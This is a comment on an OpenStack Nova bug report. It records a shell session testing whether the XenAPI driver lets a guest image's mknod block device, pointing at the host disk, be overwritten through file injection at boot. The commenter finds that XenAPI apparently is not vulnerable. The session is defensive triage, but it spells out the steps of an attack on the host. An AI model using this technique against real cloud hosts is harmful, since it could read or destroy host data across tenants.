Comment 20 for bug 1552042

After an attempted repro, I'm not convinced that XenAPI is vulnerable:

stack@DevStackOSDomU:~$ grep flat_injected /etc/nova/nova.conf
flat_injected = True

stack@DevStackOSDomU:~$ lsblk | grep xvdb
xvdb 202:16 0 1G 0 disk

stack@DevStackOSDomU:~$ nova boot --image cirros-0.3.4-x86_64-disk --flavor 1 NodevFix
stack@DevStackOSDomU:~$ nova list | grep NodevFix
| 23db106a-321d-4033-8368-cc6d91d3d307 | NodevFix | ACTIVE | - | Running | private=10.0.0.2 |

stack@DevStackOSDomU:~$ ssh cirros@10.0.0.2 sudo mknod /host-device b 202 16
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.2 sudo sync

stack@DevStackOSDomU:~$ nova image-create 23db106a-321d-4033-8368-cc6d91d3d307 ImageWithDev

stack@DevStackOSDomU:~$ echo "Before running an instance" | sudo tee /dev/xvdb
stack@DevStackOSDomU:~$ echo "After running an instance" > test-file

stack@DevStackOSDomU:~$ nova boot --file /host-device=test-file --image 508c35dd-dc18-40d5-82f1-58b0180520a8 --flavor 1 NodevFix_exploit
stack@DevStackOSDomU:~$ strings /dev/xvdb
Before running an instance

stack@DevStackOSDomU:~$ nova list | grep NodevFix_exploit
| ba73ef12-a60a-4e91-b4a0-3046db5131ba | NodevFix_exploit | ACTIVE | - | Running | private=10.0.0.6 |

stack@DevStackOSDomU:~$ ssh cirros@10.0.0.6 sudo cat /host-device
After running an instance
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.6 sudo ls -altr /host-device
-r--r----- 1 root root 26 May 31 15:13 /host-device

And just to check what happened without the file injection:
stack@DevStackOSDomU:~$ nova boot --image 508c35dd-dc18-40d5-82f1-58b0180520a8 --flavor 1 NodevFix_NoInject
stack@DevStackOSDomU:~$ nova list | grep NodevFix_NoInject
| fc3f1a45-6048-4abf-82a5-5b9b352c59fe | NodevFix_NoInject | ACTIVE | - | Running | private=10.0.0.8 |
stack@DevStackOSDomU:~$ ssh cirros@10.0.0.8 sudo ls -altr /host-device
brw------- 1 root root 202, 16 May 31 15:06 /host-device

As such, it *looks* like the way XenAPI uses vfs will replace the mknod device with the requested file?